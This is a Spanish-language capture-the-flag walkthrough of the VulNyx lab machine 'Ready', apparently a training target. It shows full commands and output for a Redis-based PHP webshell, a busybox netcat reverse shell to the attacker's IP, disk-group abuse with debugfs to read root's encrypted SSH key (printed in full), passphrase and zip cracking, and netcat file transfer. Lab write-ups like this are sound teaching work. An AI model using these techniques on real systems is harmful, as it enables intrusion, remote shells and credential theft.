🟢 NYX - Ready
#vulnyx #nyx #linux #redis #rce #disk (group) #id_rsa (crack) #zip (crack)
Junio 16, 2023 by Miguel R. (d4t4s3c)
Information
Ready es una máquina Linux de la plataforma VulNyx, tiene un nivel de dificultad fácil y fue creada por el usuario d4t4s3c.
- Acceso inicial: Se detecta un servicio Redis que permite acceso mediante usuario invitado, se carga un archivo con código PHP en la ruta del servidor web y obtengo una shell.
- Escalada de privilegios: El usuario forma parte del grupo disk y permitirá leer la clave privada (id_rsa) del usuario root.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 16:01 CET
Nmap scan report for 192.168.1.42
Host is up (0.00023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,6379,8080 192.168.1.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 16:02 CET
Nmap scan report for 192.168.1.42
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA)
| 256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA)
|_ 256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
6379/tcp open redis Redis key-value store 6.0.16
8080/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
Shell (ben)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.42/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.42/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.42:8080/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.42:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
6379/TCP (REDIS)
Me conecto al servicio Redis sin proporcionar password con una sesión de invitado
❯ redis-cli -h 192.168.1.42
192.168.1.42:6379> PING
PONG
Generate WebShell
En vista que existen servidores web, intento desde Redis crear una webshell PHP en /var/www/html y obtengo éxito
192.168.1.42:6379> config set dir /var/www/html
OK
192.168.1.42:6379> config set dbfilename cmd.php
OK
192.168.1.42:6379> set cmd "<?php system($_GET['cmd']); ?>"
OK
192.168.1.42:6379> save
OK
8080/TCP (HTTP)
Consigo ejecutar comandos como usuario ben
❯ curl -s --output - 'http://192.168.1.42:8080/cmd.php?cmd=id' |strings
REDIS0009
redis-ver
6.0.16
redis-bits
ctime
used-mem
aof-preamble
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
Reverse Shell
Ya ejecutando comandos intento obtener una reverse shell
❯ curl -sX GET "http://192.168.1.42:8080/cmd.php?cmd=busybox+nc+192.168.1.10+443+-e+/bin/sh"
Obtengo la shell como usuario ben
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.42] 59476
id ; hostname
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
ready
Flag (user.txt)
Consigo leer flag user.txt
ben@ready:~$ cat user.txt
e5d3f52*************************
Privilege Escalation
Enumeration
El usuario ben forma parte del grupo disk, esto le permite acceder en un contexto privilegiado a discos y particiones del sistema
ben@ready:/$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
Abuse (disk group)
Consigo leer la clave privada id_rsa del usuario root
ben@ready:/$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 6.9G 1.5G 5.1G 23% /
udev 473M 0 473M 0% /dev
tmpfs 489M 0 489M 0% /dev/shm
tmpfs 98M 492K 98M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
ben@ready:/$ /usr/sbin/debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs: cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE
tTN5G66QaZHsjOSYG8pFEQqUJUC4lw+WzHs3hbml1+zuLPmnDvUapYFB/4IgQNG2
jp1tebAwENVz/CdS3paB60NB9uosYXHa60Sbi7a31Ej6QqH10UnN/NROSEhqZkt+
dUcQspoDJIvHyvdhm4lIVizfvw1i9epxY+aB9W7vscpN1HAq37WdOn62nnEccLRs
wShZgOeOLTUo5j+C0oQZDi11ZJxEFiwwCFkOqZ+ZEQgshQqgG8PjMvedwuQcFjpN
wgFyQl0ZzGTzaj1iZntc/7G1/9WqXyk3IkpICucALCaSlCZ3Oh0kJd12W27vTKdO
kBpXNU8cgjc+jbIKveFZe6+ZuMwr3Lb9p+f+m7ktcTk/AFxSObuFnHBZN52VE/F4
lVK8vR7Om8qg34REgbvkmrBttg7x4AzUsTZ1WPPJqu3VS0SGVyq8vkpA2ngHmMBC
h3Ca0Xjua55GzCFBGePrQmqOd8jKZ0W6HBfCQyGB/dGg57mKNQy1OSIR4XtFYDYN
wNGTgr4KPebWf1CYRg2nleu3DD3sezutvoVMLJdzoeaLrCPX0pdfEhBase7n72Gy
Q6zqrk07p5GQeuL3tfhBsbHqgK899IMPr2VZPwvaoibDF66UJ1unfEXiPzTTHDo9
5MTR1GK7HYnmtypx3OpCDJMFGwaJgx+o944cxX9DQ63pgwx1R34RoQRfIgqUUrsG
NhEkLvrYFMnlK/dSmouuNFvd868zBlMByQyVYoepyHGhsGDuAP4Mhx7L1Gbj4dRS
dMgfgLN0lM0G+P9QvmmX7TuH1MU1IIfZZw9dCfdUqVVKyegA2RQ7fZG9D8o3l1J0
bIj0VJE7ykqqZEndzgBGRw3bEu3/OKpJM2UFqr/pPlu1w1bVIzHrTPNI5nk6dm77
n/TqwSgU2EQDWK88Z8TORZvuoNA3FelyzxCfRC2HLv0+QrVbyY7dLf3oLH0Zq+gK
1OYVrTKbe4pu0J2R7jZw20pLWeEZPuSE3RmVwcSsVzwb6dBk5rMkwCE5gG1qNh1U
koCqtHzXveisx5I7KrvBj5RTaK/aPX/v8BS/oh8AmiQr2Pqq9K+aQScP2XYh691x
yfVoFGJrZMcG5VD3QxrgWamgcHhug2LotpRbxjc777uK/muI9rUSQLYC06H2Cdf/
kRUH9Ohf3ZrVXpcCMhuCBbOxYBr+TAGjwJIBAYuFMBqhZ4gyaZhxJMCBhQOJHy6c
xR2cUdOAUh9lY40/o0Pwf+5GWiX2u5KmzcZ9iLdJ4NtgYiYMjGMe+0G37PdCXJvG
D+VsowoqCou916TMZUKpYSkzj8q3GLSib6CumVzKDesMLaYiZTOd1ShBqTlYjorp
Dlo5vrgUFk17OS8n0gtQuavBvN+2aM6gMOgiJrXfeLjzPGoY2ypHyNlbp/JI0/Y+
DfE+2kNqriAlvZps1mllIKITk1wNPQ3PVuBW9DkvrSUW7Ye+oMK3WoiQkY4qyu+2
pN0okmXmT5ygTq9KBQUEtjU8RnY27y34nYwCQus0HCA+FfRoxDbJYl0sN2g/Mzjq
PWVlSZLxzcya8sxPBA8gto3H5BxFnTxRXbCBTjTL09imi3QMl9K1emUlG8rSpBsI
-----END RSA PRIVATE KEY-----
Cracking (id_rsa)
Con RSAcrack obtengo el password shelly de la id_rsa
❯ RSAcrack -k id_rsa -w /opt/techyou.txt
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[!] Cracking | id_rsa
[!] Wordlist | /opt/techyou.txt
[*] Status | 979/10000/9%/shelly
[+] Password | shelly
─────────────────────────────
22/TCP (SSH)
Accedo al sistema como usuario root con la clave privada obtenida
❯ ssh -i id_rsa root@192.168.1.42
Enter passphrase for key 'id_rsa':
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
ready
Al intentar leer la flag root.txt parece que se ubica dentro de el archivo root.zip
root@ready:~# ls -l
total 4
-rw------- 1 root root 225 abr 18 2023 root.zip
Transfiero el archivo root.zip a mi màquina local
root@ready:~# md5sum root.zip
e72dd8ebb0227bda9e33a44abad9b23e root.zip
root@ready:~# nc 192.168.1.10 1234 < root.zip
❯ nc -lvnp 1234 > root.zip
listening on [any] 1234 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.42] 41398
^C
❯ md5sum root.zip
e72dd8ebb0227bda9e33a44abad9b23e root.zip
Al intentar descomprimir el archivo root.zip solicita password
❯ unzip root.zip
Archive: root.zip
[root.zip] root.txt password:
Cracking (ZIP File)
Con zip2john consigo el password already del archivo ZIP
❯ zip2john root.zip >hash
❯ john --wordlist=/opt/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
already (root.zip/root.txt)
Flag (root.txt)
Consigo leer la flag root.txt
❯ unzip root.zip
Archive: root.zip
[root.zip] root.txt password:
inflating: root.txt
❯ cat root.txt
cf537b0******************************
Hasta aquí la resolución de la máquina Ready.
Happy Hacking!
© d4t4s3c 2023-2025